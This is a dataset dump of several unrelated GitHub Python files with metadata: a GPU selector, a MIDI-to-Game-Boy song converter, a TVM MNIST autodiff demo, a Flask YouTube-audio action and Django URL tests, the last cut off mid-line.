nx.DiGraph()\r\n graph, pos = create_graph(graph, node)\r\n _, ax = plt.subplots(figsize=(80, 30))\r\n nx.draw_networkx(graph, pos, ax=ax, node_size=1000)\r\n if not os.path.exists(\"img\"):\r\n os.mkdir(\"img\")\r\n plt.savefig(\"img/test.jpg\")\r\n", "repo_name": "xcmyz/ExpressionTransformation", "sub_path": "visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "networkx.DiGraph", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "networkx.draw_networkx", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "25576373575", "text": "import pynvml\nimport os \n\n\ndef autoset_nvgpu(metric=\"memory\", k=1):\n \"\"\"autoset_nvgpu\n automatically set NVIDIA GPU device\n\n Args:\n metric (str): memory/utilization\n select the GPU with min(metric)\n k (int): num. of selected devices\n \"\"\"\n pynvml.nvmlInit()\n gpunum = pynvml.nvmlDeviceGetCount()\n assert(k <= gpunum)\n metric_list = []\n for idx in range(gpunum):\n handle = pynvml.nvmlDeviceGetHandleByIndex(idx)\n\n if metric in [\"util\", \"utilization\"]:\n util_rate = pynvml.nvmlDeviceGetUtilizationRates(handle)\n metric_list.append((util_rate, idx))\n else:\n mem_info = pynvml.nvmlDeviceGetMemoryInfo(handle)\n mem_use_rate = 1.0 - mem_info.free / mem_info.total\n metric_list.append((mem_use_rate, idx))\n # sort the devices with ascending metric\n metric_list = sorted(metric_list, key=lambda x:x[0])\n selected_idx = [str(x[1]) for x in metric_list[:k]]\n # set the visible devices\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \",\".join(selected_idx)", "repo_name": "yuanmu97/nvselector", "sub_path": "nvselector/selector.py", "file_name": "selector.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pynvml.nvmlInit", "line_number": 14, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetCount", "line_number": 15, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetHandleByIndex", "line_number": 19, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetUtilizationRates", "line_number": 22, "usage_type": "call"}, {"api_name": "pynvml.nvmlDeviceGetMemoryInfo", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "73690337473", "text": "\"\"\"\nMain program. Assembles and plays a Game Boy song from the provided MIDI file. \nTakes three arguments: the MIDI file to parse, a number from 1-255 which control's the song's tempo,\nand a number which controls the pitch. \n\"\"\"\n\nimport sys \nimport re\nimport math\nfrom collections import Counter \nimport subprocess\nfrom ByteUtils import *\n\nMIN_PITCH = -6\nMAX_PITCH = 2\n\n#http://www.music.mcgill.ca/~ich/classes/mumt306/StandardMIDIfileformat.html#BMA1_\nEVENT_NOTE_OFF = 0x80\nEVENT_NOTE_ON = 0x90\nEVENT_CONTROL_CHANGE = 0xB0\nEVENT_PROGRAM_CHANGE = 0xC0\n\nSTRING_NOTE_OFF = \"Note Off\"\nSTRING_NOTE_ON = \"Note On\"\nSTRING_CONTROL_CHANGE = \"Control Change\"\nSTRING_PROGRAM_CHANGE = \"Program Change\"\nSTRING_EVENT_UNKNOWN = \"Unknown\"\n\nHighestNoteIndex = 38\n\n\n\"\"\" Contains all the tracks of a single MIDI file, plus the file header. \nThere's also some metadata relating to tempo and timing, which this program doesn't use.\"\"\"\nclass MidiFile:\n header = -1\n metricalTiming = -1\n globalTempoTrack = -1\n tracks = -1\n \n def __init__(self, header, metricalTiming,globalTempoTrack,tracks):\n self.header = header\n self.metricalTiming = metricalTiming\n self.globalTempoTrack = globalTempoTrack\n self.tracks = tracks\n \n def PrintTracks(self):\n for i in range(0,len(self.tracks)):\n track = self.tracks[i]\n highestNote = max([e.note for e in track.events])\n lowestNote = min([e.note for e in track.events])\n outOfBoundsCount = (len([e for e in track.events if e.note>HighestNoteIndex or e.note<0]))\n print(str(i) + \"\\t\" + track.title)\n print(\"Length: \" + str(len(track.events)))\n print(\"Highest:\" + str(highestNote))\n print(\"Lowest: \" + str(lowestNote)) \n print(\"Num out of bounds: \" + str(outOfBoundsCount))\n print('\\n')\n \n def MergeTracks(self):\n title = \"\"\n events = list()\n for t in self.tracks:\n events = events + t.events\n title = title + t.title + \", \"\n list.sort(events,key=lambda x: x.timeStamp)\n self.tracks = [MidiTrack(title,events)]\n \n def RemoveDrums(self):\n \"\"\" Can't map drum tracks to a melody, unless you want your songs turned into hardcore Eurobeat.\n They should probaly be implemented by the Game Boy's noise channel. \n I haven't done that yet, so I just get rid of drums for now.\"\"\"\n \n drums = [t for t in self.tracks if \"drum\" in t.title.lower()]\n print(\"Removing \" + str(len(drums)) + \" drum tracks.\")\n \n self.tracks = [t for t in self.tracks if \"drum\" not in t.title.lower()]\n #Yes, it's a hack. A better solution would be to check the patch number\n #(http://www.music.mcgill.ca/~ich/classes/mumt306/StandardMIDIfileformat.html#BM1_4)\n \n def RemoveEmptyTracks(self):\n self.tracks = [t for t in self.tracks if len(t.events) > 0]\n \n\n def PeekTrack(self,index,maxlength):\n print(\"Peeking track: \" + self.tracks[index].title)\n length = min(maxlength,len(self.tracks[index].events))\n \n for i in range(0,length):\n print(self.tracks[index].events[i])\n\n\"\"\"Single track of a MIDI. Usually a single instrument.\"\"\"\nclass MidiTrack:\n title = \"\"\n events = []\n lastProgramChangeTime = 0\n def __init__(self, title, events):\n self.title = title\n self.events = events\n \n pcs = sorted((e for e in events if e.eventType == STRING_PROGRAM_CHANGE), key=lambda e: e.timeStamp)\n if(len(pcs) > 0):\n self.lastProgramChangeTime = pcs[0].timeStamp\n \n\n\n\"\"\"MIDI event. Beginning of note, end of note, etc. \nWe don't do sustained notes, so we're only really interested in note beginnings.\"\"\"\nclass MidiEvent:\n eventType = \"none\"\n note = -1\n deltaTime = -1\n timeStamp = -1\n \n eventBytes = []\n def __init__(self, eventType, note):\n self.eventType = eventType\n self.note = note\n def __str__(self):\n return \"TimeStamp:\" + str(self.timeStamp) + \"\\t\\t\" + str(self.eventType) + \"\\t\\tNote:\" + str(self.note) + \"\\t\\tDeltaTime:\" + str(self.deltaTime)\n\n\"\"\" Parse an entire MIDI blob.\"\"\"\ndef ReadRawMidiData(dump):\n print(\"Reading MIDI file.\")\n txt = ReadAsText(dump,0,len(dump),printWhileReading=False)\n splits = re.split('MThd|MTrk',txt)\n splits = [[ord(s) for s in split] for split in splits if len(split) > 0]\n header = splits[0][4:10]\n print(str(header[3]) + \" tracks discovered.\") \n \n \n if(header[1] == 2):\n print(\"Midi Header format 2: cannot parse.\")\n return False\n elif(header[1] == 1 or header[1] == 0):\n metricalTiming = (header[4]*256)+header[5]\n globalTempoTrack = splits[1]\n \n tracks = list()\n startOfTracks = 1\n #if(header[1] == 0):\n # startOfTracks = 1\n #startOfTracks = 1 \n for i in range(startOfTracks,len(splits)):\n track = splits[i][5:]\n \n titleLength = track[2]\n title = \"\".join([chr(c) for c in track[3:3+titleLength]])\n trackWithoutTitle = track[4+titleLength:]\n trackEvents = ReadMidiTrack(trackWithoutTitle)\n \n track = MidiTrack(title,trackEvents)\n tracks.append(track)\n \n return MidiFile(header,metricalTiming,globalTempoTrack,tracks)\n else:\n print(\"Unknown header type \" + str(header[1]) + \", could not make midi object.\")\n\n\n\"\"\" Parse an individual MIDI track.\"\"\"\ndef ReadMidiTrack(track):\n events = []\n cursor = 0\n totalTime = 0\n while(cursor0]\n\n\"\"\"Lowers the song's pitch so that the lowest note is at index 0, which is a C.\nWe only have a range of about three octaves, so we need to use everything we have!\"\"\"\ndef NormalizeNotes(events):\n minNote = min([e.note for e in events])\n for e in events:\n e.note-=minNote\n return events\n\n\ndef SetSongPitch(midi,pitchOffset):\n if(pitchOffset == 0):\n return\n elif(pitchOffset > 0 and pitchOffset <= 4):\n for i in range(0,pitchOffset):\n ForEachTrack(midi,PushNotesUpHalfOctave)\n elif(pitchOffset < 0 and pitchOffset >= -4):\n for i in range(0,abs(pitchOffset)):\n ForEachTrack(midi,PushNotesDownHalfOctave)\n else:\n print(\"Invalid pitch offset: \" + str(pitchOffset))\n\n\ndef WrapNotesDownOneOctave(events):\n return WrapNotes(events,-12)\ndef WrapNotesUpOneOctave(events):\n return WrapNotes(events,12)\n\ndef PushNotesDownOneOctave(events):\n return PushNotes(events,-12)\ndef PushNotesUpOneOctave(events):\n return PushNotes(events,12)\n\ndef PushNotesDownHalfOctave(events):\n return PushNotes(events,-6)\ndef PushNotesUpHalfOctave(events):\n return PushNotes(events,6)\n\ndef WrapNotes(events,amount=0):\n return PushNotes(events,amount,36)\n\ndef PushNotes(events,amount=0,pushingFactor=12):\n for e in events:\n e.note+=amount\n while(e.note<0):\n e.note+=pushingFactor\n while(e.note>HighestNoteIndex):\n e.note-=pushingFactor\n return events\n\n\"\"\" Recalculate the time gaps between notes after removing irrelevant MIDI events.\"\"\"\ndef RecalculateDeltaTime(events):\n for i in range(0,len(events)-1):\n event = events[i]\n nextTimeStamp = events[i+1].timeStamp\n event.deltaTime = nextTimeStamp-event.timeStamp\n events[len(events)-1].deltaTime = next(e.deltaTime for e in events if e.deltaTime>0)\n return events\n\n\"\"\" Try to downscale the time gaps between notes. \nIdeally we want to divide by the greatest common divisor - ie, if all time gaps are 100 or 200 units, we want to divide by 100.\nSmaller intervals are neater, and easier to work with when messing with the song's tempo.\"\"\"\ndef DivideDeltaTime(events):\n factor = GetDividingFactor(events)\n for e in events:\n e.deltaTime = round(e.deltaTime/factor)\n return events\n\ndef GetDividingFactor(events): \n deltaTimes = [e.deltaTime for e in midi.tracks[0].events if e.deltaTime>0]\n mostCommon = Counter(deltaTimes).most_common(1)[0][0] \n smallerThanMostCommonDeltaTimes = [t for t in set(deltaTimes) if t=mostCommon/16]\n \n ratiosTotal = dict()\n for f in factors:\n ratiosTotal[f] = 0\n for s in smallerThanMostCommonDeltaTimes:\n ratio = max([f,s])/min([f,s])\n ratio = ratio-math.floor(ratio)\n ratiosTotal[f]+=ratio\n \n if(len(ratiosTotal) == 0):\n return 1\n #print(\"Ratios total: \" + str(len()))\n\n ratiosSorted = sorted(ratiosTotal.items(), key = lambda x: (x[1], -x[0]))\n return ratiosSorted[0][0]\n\ndef factorlist(n): \n output = list()\n for i in range(2, int(n/2)+1):\n if n % i == 0:\n output.append(i)\n return output\n\n\"\"\"Converts the track into a format that can be injected into a Game Boy ASM file.\nThe format is extremely simple. Every note is represented by a pair of hexidecimal integers.\nThe first integer is the pitch, starting at C and working upwards. The second integer\nis the delay before playing the next note. This delay is proportional to the speed\nargument in RunSong(). \nIf the Game Boy program reads a 255 for the note's pitch, it exits.\"\"\"\ndef WriteTrackInAsmFormat(track):\n output = ''\n output+='\\t'\n output+=\"db \"\n for e in track.events:\n byteNote = '%02x'%(e.note)\n byteDeltaTime = '%02x'%(e.deltaTime)\n if(len(byteNote)>2):\n byteNote = \"FF\"\n if(len(byteDeltaTime)>2):\n byteDeltaTime = \"FF\"\n\n output+=\"&\"\n output+=byteNote.upper()\n output+=\",&\"\n output+=byteDeltaTime.upper()\n output+=\",\"\n output+=\"255,255\"\n return output\n\ndef WriteTrackInPlaintext(track):\n song = \"\"\n for e in track.events:\n song+=(str(e.note)+ \",\" + str(e.deltaTime) + '\\n')\n return song\n\n\"\"\"Executes a batch script which compiles and plays the song. You need VASM and an emulator. An example script is provided,\nbut if you're using another emulator (or a different version of VASM) you can swap in your own.\nThe delay argument is a hex number in the range 00-FF which decides the tempo of the song.\nLarger delay means a bigger gap between notes, and thus a slower song.\nThe actual delay between notes is proportional to the *square* of this value, so keep that in mind if you're adjusting it. Halving\nthe delay won't double the speed of the song, it'll quadruple it. \n\"\"\"\ndef RunSong(asm,noteDelay):\n asm+='\\nSpeed:\\n\\tdb &'\n asm+=noteDelay\n f = open(songBytesFile,'w')\n f.write(asm)\n f.close()\n subprocess.check_output(runGameCommand)\n\nusage_errmsg = \"Usage: MIDI2GB.py 255):\n print(tempo_errmsg)\n exit(-1)\n \npitch = sys.argv[3]\nif(not pitch.lstrip(\"-\").isdigit()):\n print(pitch_errmsg)\n exit(-1)\n\npitch = int(pitch)\nif(pitch < MIN_PITCH or pitch > MAX_PITCH):\n print(pitch_errmsg)\n exit(-1)\n\n\nspeed = '%x' % speed\nprint(\"Playing song with delay \" + speed + \" and pitch \" + str(pitch))\n\n \nmidiPath = sys.argv[1]\nsongBytesFile = r\"Song_Bytes.asm\"\nGBSongFile = r\"GB_Song.asm\"\nmakeGameBat = r\"makegame.bat\"\nrunGameCommand = makeGameBat + \" \" + GBSongFile\n\ndump = ReadHexDump(midiPath)\nmidi = ReadRawMidiData(dump)\n\nmidi.RemoveDrums()\n#midi.PrintTracks()\n\nForEachTrack(midi,FilterToNoteOnOnly)\nmidi.RemoveEmptyTracks()\n\nSetStartTimeToFirstProgramChange(midi)\n\nmidi.MergeTracks()\n\nForEachTrack(midi,RecalculateDeltaTime)\nForEachTrack(midi,DivideDeltaTime)\nForEachTrack(midi,NormalizeNotes)\nSetSongPitch(midi,pitch)\n\n#midi.PrintTracks()\n#midi.PeekFirstTrack(30)\n\nasm = WriteTrackInAsmFormat(midi.tracks[0])\n\nRunSong(asm,speed)\n\n#midi.MergeTracks()\n#midi.PeekFirstTrack(30)\n\n#ForEachTrack(midi,WrapNotes)\n#ForEachTrack(midi,WrapNotesUpOneOctave)\n#ForEachTrack(midi,WrapNotesDownOneOctave)\n#ForEachTrack(midi,PushNotes)\n#ForEachTrack(midi,PushNotesUpOneOctave)\n#ForEachTrack(midi,PushNotesDownHalfOctave)", "repo_name": "Simononeill493/MIDI2GB", "sub_path": "MIDI2GB.py", "file_name": "MIDI2GB.py", "file_ext": "py", "file_size_in_byte": 15208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.split", "line_number": 125, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 221, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 311, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 322, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 384, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 390, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 394, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 404, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]} +{"seq_id": "70348573634", "text": "import tvm\nimport topi\nimport numpy as np\nimport time\nimport keras.datasets.mnist as mnist\n\nfrom train.runners import run_tvm\n\n\ndef mnist_load():\n (Xtr,ytr),(Xte,yte) = mnist.load_data(\"/tmp/mnist.npz\")\n return (Xtr,ytr),(Xte,yte)\n\ndef mnist_img(ids):\n return np.expand_dims(mnist_load()[0][0][ids], axis=3).astype(np.float32)\n\ndef mnist_cls(ids):\n return mnist_load()[0][1][ids]\n\ndef mnist_cls_oh(ids):\n z=np.zeros((len(ids),10),dtype=np.float32)\n z[np.arange(len(ids)),mnist_cls(ids)]=1\n return z.astype(np.float32)\n\ndef get_shape(tensor):\n return [tvm.ir_pass.Simplify(s).value for s in tensor.shape]\n\n\n\ndef demo_conv2d():\n lrate = 0.1\n nbatches = 100 # batches to train\n\n num_classes = 10\n batch_size = 10\n img_h = 28\n img_w = 28\n img_c = 1\n\n f1_c = 4\n f2_c = 5\n f3_units = 16\n\n x = tvm.placeholder((batch_size, img_h, img_w, img_c),name='x')\n y = tvm.placeholder((batch_size, num_classes),name='y')\n\n print('Block1')\n w1 = tvm.placeholder((3,3,img_c,f1_c),name='w1')\n b1 = tvm.placeholder((f1_c,), name='b1')\n t = topi.nn.conv2d(x, w1, 1, 0, layout='NHWC', out_dtype=tvm.float32)\n t = t + topi.broadcast_to(b1, (batch_size,1,1,f1_c))\n print('Block1: after-biasing shape is', get_shape(t))\n t = topi.nn.pool(t, [2, 2], [2, 2], [0, 0, 0, 0], 'max', layout='NHWC')\n print('Block1: after-pooling shape is', get_shape(t))\n t = topi.nn.relu(t)\n print('Block1: after-relu shape is', get_shape(t))\n\n\n print('Block2')\n w2 = tvm.placeholder((3,3,f1_c,f2_c),name='w2')\n b2 = tvm.placeholder((f2_c,), name='b2')\n t = topi.nn.conv2d(t, w2, 1, 0, layout='NHWC', out_dtype=tvm.float32)\n t = t + topi.broadcast_to(b2, (batch_size,1,1,f2_c))\n print('Block2: after-biasing shape is', get_shape(t))\n t = topi.nn.pool(t, [2, 2], [2, 2], [0, 0, 0, 0], 'max', layout='NHWC')\n print('Block2: after-pooling shape is', get_shape(t))\n t = topi.nn.relu(t)\n print('Block2: after-relu shape is', get_shape(t))\n t = topi.nn.flatten(t)\n print('Block2: after-flattern shape is', get_shape(t))\n\n\n print('Block3')\n w3 = tvm.placeholder((f3_units, get_shape(t)[1]))\n b3 = tvm.placeholder((f3_units,))\n t = topi.nn.dense(t,w3,b3)\n print('Block3: after-dense shape is', get_shape(t))\n\n\n print('Block4')\n w4 = tvm.placeholder((num_classes, get_shape(t)[1]))\n b4 = tvm.placeholder((num_classes,))\n t = topi.nn.dense(t,w4,b4)\n print('Block4: after-dense shape is', get_shape(t))\n t = topi.nn.relu(t)\n\n p = topi.argmax(t,axis=1)\n # TODO: check the correctnesss of the log_softmax expression\n # TODO: figure out the difference between it and standard cross-entropy loss\n l = - topi.sum(y * topi.nn.log_softmax(t)) / batch_size\n\n print('Block4: loss shape is', get_shape(l))\n\n ones = topi.full_like(l, 1.0)\n #[dl_dw1,dl_db1,dl_dw2,dl_db2,dl_dw3,dl_db3,dl_dw4,dl_db4]\n params = [w1,b1,w2,b2,w3,b3,w4,b4]\n\n dl = list(tvm.ir_pass.JacobianRecursive(l, params, ones))\n assert len(params)==len(dl)\n print('dl_dw1 weight is', get_shape(params[0]))\n\n sdl = tvm.create_schedule([p.op for p in [x,y,l] + params + dl])\n mdl = tvm.build(sdl, [x,y,l] + params + dl)\n print('Train+Inference module', mdl)\n\n # sl = tvm.create_schedule([l.op])\n # ml = tvm.build(sdl, [x,y] + params + [l])\n # print('Inference module',ml)\n\n state={}\n for p in params:\n state.update({p:tvm.nd.array(np.random.uniform(-1.0, 1.0, size=get_shape(p)).astype(np.float32))})\n\n grads={}\n for p,g in zip(params,dl):\n grads.update({p:tvm.nd.empty(get_shape(g))})\n\n for ib in range(nbatches):\n b=range(ib*batch_size,(ib+1)*batch_size)\n tx=tvm.nd.array(mnist_img(b))\n ty=tvm.nd.array(mnist_cls_oh(b))\n tl=tvm.nd.empty(shape=(), dtype=tvm.float32)\n\n print('Entering')\n mdl(*([tx,ty,tl]+list(state.values())+list(grads.values())))\n print('Done','loss',tl.asnumpy())\n\n state2={}\n for p in params:\n state2.update({p:tvm.nd.array(state[p].asnumpy()-lrate*grads[p].asnumpy())})\n\n state = state2\n\n\n\n", "repo_name": "grwlf/nixtvm", "sub_path": "src/mironov/train/autodiff_conv.py", "file_name": "autodiff_conv.py", "file_ext": "py", "file_size_in_byte": 3924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 11, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tvm.ir_pass.Simplify", "line_number": 26, "usage_type": "call"}, {"api_name": "tvm.ir_pass", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 49, "usage_type": "call"}, {"api_name": "topi.nn.conv2d", "line_number": 50, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 50, "usage_type": "attribute"}, {"api_name": "topi.broadcast_to", "line_number": 51, "usage_type": "call"}, {"api_name": "topi.nn.pool", "line_number": 53, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 55, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 60, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 61, "usage_type": "call"}, {"api_name": "topi.nn.conv2d", "line_number": 62, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "topi.broadcast_to", "line_number": 63, "usage_type": "call"}, {"api_name": "topi.nn.pool", "line_number": 65, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 67, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "topi.nn.flatten", "line_number": 69, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 74, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 75, "usage_type": "call"}, {"api_name": "topi.nn.dense", "line_number": 76, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tvm.placeholder", "line_number": 81, "usage_type": "call"}, {"api_name": "tvm.placeholder", "line_number": 82, "usage_type": "call"}, {"api_name": "topi.nn.dense", "line_number": 83, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "topi.nn.relu", "line_number": 85, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 85, "usage_type": "attribute"}, {"api_name": "topi.argmax", "line_number": 87, "usage_type": "call"}, {"api_name": "topi.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "topi.nn.log_softmax", "line_number": 90, "usage_type": "call"}, {"api_name": "topi.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "topi.full_like", "line_number": 94, "usage_type": "call"}, {"api_name": "tvm.ir_pass.JacobianRecursive", "line_number": 98, "usage_type": "call"}, {"api_name": "tvm.ir_pass", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tvm.create_schedule", "line_number": 102, "usage_type": "call"}, {"api_name": "tvm.build", "line_number": 103, "usage_type": "call"}, {"api_name": "tvm.nd.array", "line_number": 112, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tvm.nd.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 120, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 121, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tvm.nd.empty", "line_number": 122, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tvm.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tvm.nd.array", "line_number": 130, "usage_type": "call"}, {"api_name": "tvm.nd", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "33657278901", "text": "from youtube_dl import YoutubeDL\nfrom flask import Flask, render_template, request, url_for, flash, redirect, Response, session, jsonify\napp = Flask(__name__)\n\nhost = '0.0.0.0'\nport = 5387 \nyoutube_options = {\n 'format': 'bestaudio/best',\n 'restrictfilenames': False,\n 'noplaylist': False,\n 'nocheckcertificate': True,\n 'ignoreerrors': False,\n 'logtostderr': False,\n 'quiet': True,\n 'no_warnings': True,\n 'default_search': 'auto',\n 'cachedir': False\n}\n\noutput_from_query = {\n \"session\": {\n \"id\": \"\",\n \"params\": {}\n },\n \"scene\": {\n \"name\": \"\",\n \"slots\": {},\n \"next\": {\n \"name\": \"\"\n }\n },\n}\n\nytdl = YoutubeDL(youtube_options)\n\n\ndef create_query_response(params, session_id, current_scene, next_scene):\n output = output_from_query.copy()\n output['session']['params'] = params\n output['session']['id'] = session_id\n output['scene']['name'] = current_scene\n output['scene']['next']['name'] = next_scene\n return jsonify(output)\n\n\ndef play(params, session):\n if params:\n song_name = params.get(\"song_name\")\n if song_name:\n song_name_parsed = song_name.get(\"resolved\")\n if song_name_parsed:\n song_data = get_query_results(song_name_parsed)\n song_url = song_data.get(\"song_url\")\n channel_name = song_data.get(\"channel_name\")\n actual_song_name = song_data.get(\"song_name\")\n if song_url and actual_song_name and channel_name:\n return create_query_response({\"found\": True, \"song_name\": actual_song_name, \"song_url\": song_url, \"channel_name\": channel_name}, session.get(\"id\"), \"fill_play\", \"start_play\")\n return create_query_response({\"found\": False, \"song_name\": \"\", \"song_url\": \"\", \"channel_name\": \"\"}, session.get(\"id\"), \"fill_play\", \"start_play\")\n\n@app.route(\"/api\", methods=['POST'])\ndef api():\n json_data = request.get_json(force=True)\n handler = json_data.get(\"handler\")\n if handler:\n if handler.get(\"name\") == \"play\":\n intent = json_data.get(\"intent\")\n if intent:\n params = intent.get(\"params\")\n session = json_data.get(\"session\")\n response = play(params, session)\n return response\n return {\"msg\": \"Invalid parameter(s)\"}, 422\n\n\ndef get_query_results(query):\n if not query:\n return {}\n data = ytdl.extract_info(f\"ytsearch:{query}\", download=False)\n search_results = data['entries']\n if not search_results:\n return {}\n result = search_results[0]\n song_name = result['title']\n channel_name = result['uploader']\n for format_ in result['formats']:\n if format_['ext'] == 'm4a':\n m4a_url = format_['url']\n return {\"song_name\": song_name, \"channel_name\": channel_name, \"song_url\": m4a_url}\n return {}\n\n\nif __name__ == \"__main__\":\n app.run(host = host, port=port, debug=False)\n\n", "repo_name": "Suhas-13/youtube-action", "sub_path": "youtube-action/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 70, "usage_type": "argument"}]} +{"seq_id": "33181226975", "text": "from django.urls import reverse, resolve\nfrom django.test import TestCase\nfrom matrix.views import coveys_matrix_page, covey_sort_backlog, \\\n update_matrix_task, retire_task_from_matrix, change_matrix_task_state\nfrom django.contrib.auth.models import User\nfrom tasks.models import TaskList, SimpleTask\nfrom django.utils import timezone\nfrom datetime import date\n\n\nclass MatrixUrlsTest(TestCase):\n\n def setUp(self):\n self.add_data()\n self.task_id = SimpleTask.objects.get(name=\"tâche 1\",\n description=\"Description :)\").id\n\n self.tasklist_id = TaskList.objects.get(name=\"Loisirs\",\n color=\"#55b37e\").id\n\n def add_data(self):\n\n user = User.objects.create_user(username=\"test@test.com\",\n password=\"testpassword\")\n\n tasklist = TaskList.objects.create(user=user, name=\"Loisirs\",\n color=\"#55b37e\")\n\n SimpleTask.objects.create(tasklist=tasklist,\n name=\"tâche 1\",\n due_date=date.today(),\n description=\"Description :)\",\n creation=timezone.now(),\n is_done=False)\n\n def test_coveys_matrix_page_url_is_resolved(self):\n url = reverse(coveys_matrix_page)\n self.assertEqual(resolve(url).func, coveys_matrix_page)\n\n def test_covey_sort_backlog_url_is_resolved(self):\n url = reverse(covey_sort_backlog, args=[self.task_id])\n self.assertEqual(resolve(url).func, covey_sort_backlog)\n\n def test_update_matrix_task_url_is_resolved(self):\n url = reverse(update_matrix_task)\n self.assertEqual(resolve(url).func, update_matrix_task)\n\n def test_retire_task_from_matrix_url_is_resolved(self):\n url = reverse(retire_task_from_matrix)\n self.assertEqual(resolve(url).func, retire_task_from_matrix)\n\n def test_change_matrix_task_state_url_is_resolved(self):\n url = reverse(change_matrix_task_state)\n self.assertEqual(resolve(url).func, 